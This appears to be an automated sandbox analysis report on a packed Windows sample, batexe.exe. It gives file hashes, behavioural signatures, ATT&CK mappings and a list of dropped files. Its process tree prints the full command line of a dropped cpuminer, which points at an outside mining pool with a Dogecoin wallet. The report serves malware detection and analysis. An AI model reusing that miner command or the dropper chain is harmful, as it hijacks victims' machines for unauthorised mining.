73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14/02/2024, 09:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2104	b2e.exe
2700	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2700	cpuminer-sse2.exe
2700	cpuminer-sse2.exe
2700	cpuminer-sse2.exe
2700	cpuminer-sse2.exe
2700	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1372-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 2104	1372	batexe.exe	75
PID 1372 wrote to memory of 2104	1372	batexe.exe	75
PID 1372 wrote to memory of 2104	1372	batexe.exe	75
PID 2104 wrote to memory of 1040	2104	b2e.exe	76
PID 2104 wrote to memory of 1040	2104	b2e.exe	76
PID 2104 wrote to memory of 1040	2104	b2e.exe	76
PID 1040 wrote to memory of 2700	1040	cmd.exe	79
PID 1040 wrote to memory of 2700	1040	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Users\Admin\AppData\Local\Temp\9867.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9867.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9867.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9AE8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9867.tmp\b2e.exe

Filesize
2.6MB

MD5
be31dd8ad321d4e64346cb76df5b54b7

SHA1
25cd8d53d53fd964de88a92834c658f89a91b40c

SHA256
52561ae132e01c21db4dcaac029541399f91ffed181e6bb8ad5fdb787b213834

SHA512
3faabb91b1d15fb7be996f7f57de798ff87f52dead1ffd738e15dbe2fd5e2544f70cc4a92c14cf0103aeb6782b65eae3bd39cb0e726ef8ea578bd84a2b3960f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\9867.tmp\b2e.exe

Filesize
2.4MB

MD5
f68134b5f6b3d41f045f3b09452eba86

SHA1
420c2f14e5d74af5e4b5ea9c9d176ae6130f4af2

SHA256
e506b55dbf965f9e6c0664ff434008e25b9681ae9e51810573b71fcf3adc841a

SHA512
a671ff4afd8787111aa96493cb165215050a902a7c035ab88d5f7bc652b84685f409bf0a18c8b2ac1ec0c78ad567d133e9a7dadc560cbc33ab2c564d4127168f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9AE8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
914KB

MD5
224cffab296834ccd71f8f6b629fa4b4

SHA1
6d95ec02dadb0a2cde06c5086e70cd59540ae752

SHA256
531a6754d96c24b9746dbad86d03868d79c5bc9b836bb77a634d2b4824bd0f1f

SHA512
babe9f3f2d48da239b52193e92b758f4e0cf6b4632e310b659be1fef3ae0d6f86f4630071bce31946b566749b44c6dadca6113866d7e6a58dbfbf57e35bcc3e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
f1434a39423f2a856c4c00ba548b26b3

SHA1
b0f1e9e9c785878b8858e0d3ef9ddef21d0ce094

SHA256
5cc27009776513aa9cf2cc6348c735233da4ec90b8aec5e4832a76e2f5ace434

SHA512
cfffee214e2beaa80213c546992ead1a302317f755fc3fdadf4fe3e63e1f93e5e2077473c2b5318840ab068bb6b934f06a01aec62868f94e8f707ab03d231a34

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
862KB

MD5
ca72b8dfe02121c2bf25552ca309ba49

SHA1
36be25ca667e06bc36625c246b4c1876070c2e9a

SHA256
0a3358411c3012e565c2a4a49fc272d30ea9eedfe534a84b6f4bd9ebfda32446

SHA512
e7095f8f8773423d9094256446cc14ecf094acc3c184b37c669dfa9bce6f0011fa6d32ae905e8516fc2b4994326b716211f7caf9c15449cdfca4f683bbb9450c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
974KB

MD5
c1a48df178eb0229c38b198cd8aa672a

SHA1
bcdb833b296e10f977d525d44da51c4d8f407ecd

SHA256
dac7da253de5b4ca065f067165edaed2af857e5f27cd0dbbb38a1d0314f80a2e

SHA512
40832693c18e16f30815a766df66f0d1018c9f4304e3a83f2b63caf83bead6a4a90e76ebe8c1e9966e02f17b27bb12ea677e9eb3e19761d8112bcc33252cd537

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
928KB

MD5
19d620902f08b020c0260cae43d73a73

SHA1
e6fd8f2a19c00d064547661a3e785fc0e04cdbbb

SHA256
f3d2a320b35ecd3d6e83138174acbf1f67808bd81d0f0e1c78b6b340faf0fc8e

SHA512
ecbf18a6416df6d38ef80772893065479c5daa33e830523294749cf5c12856a7accabd24b0c4f2a6ef89d436600706b76955447d166321ee6351f9163ce0d8cb

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
692KB

MD5
d6ab0e0acfab82120672617b7af977bf

SHA1
80a5ad37ba511014f820e5424809ffed454c639d

SHA256
844420571d0f2f2e229c9cd856534fe4dd5a1837fd286f20925ed6cbcdec70a9

SHA512
eae5b3b2a967c6122b3452d3ff8bc6b74724f2b37325442c9d72a95c8c7ee8bb0012560bf3f3700b48250382bbee935fc13e83c1847a74bf258117a78bc639d0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
832KB

MD5
89a132deeb03120e55dd83b43ed2b699

SHA1
c6c80a18724584aea72479d1f524b64f07d7d948

SHA256
c2e2306e8018d42b217fd8bb312f5633e7cba3262457f870937672d2b094b5ef

SHA512
160a007d5e2c5d56d8897fbc19127e6d15939584e552214f5e1a48f815b970a6fce5adcca0ca181d044ad89a78f6d32c05082dfc12b423d03fbe29daa74db09a

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1372-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2104-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2104-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2700-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2700-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2700-44-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/2700-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-43-0x00000000536F0000-0x0000000053788000-memory.dmp

Filesize
608KB

Download
memory/2700-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2700-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download